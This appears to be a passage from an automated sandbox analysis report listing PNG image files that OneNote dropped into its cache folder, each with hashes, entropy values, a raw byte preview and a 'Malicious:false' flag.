                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001D.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2232
                                                                                                                                            Entropy (8bit):7.837610270261933
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                            MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                            SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                            SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                            SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001E.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001F.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13084
                                                                                                                                            Entropy (8bit):7.940058639272698
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                            MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                            SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                            SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                            SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001G.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001H.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4847
                                                                                                                                            Entropy (8bit):7.950192613458318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                            MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                            SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                            SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                            SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001I.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001J.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1657
                                                                                                                                            Entropy (8bit):7.80882577056055
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                            MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                            SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                            SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                            SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001K.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2210
                                                                                                                                            Entropy (8bit):7.86853667196985
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                            MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                            SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                            SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                            SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001L.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14458
                                                                                                                                            Entropy (8bit):7.944094738048628
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                            MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                            SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                            SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                            SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001M.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13030
                                                                                                                                            Entropy (8bit):7.948664903731204
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                            MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                            SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                            SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                            SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001N.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3879
                                                                                                                                            Entropy (8bit):7.9281351307465044
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                            MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                            SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                            SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                            SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001O.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19235
                                                                                                                                            Entropy (8bit):7.944867159042578
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                            MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                            SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                            SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                            SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001P.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7374
                                                                                                                                            Entropy (8bit):7.955141875077912
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                            MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                            SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                            SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                            SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                            Malicious:false
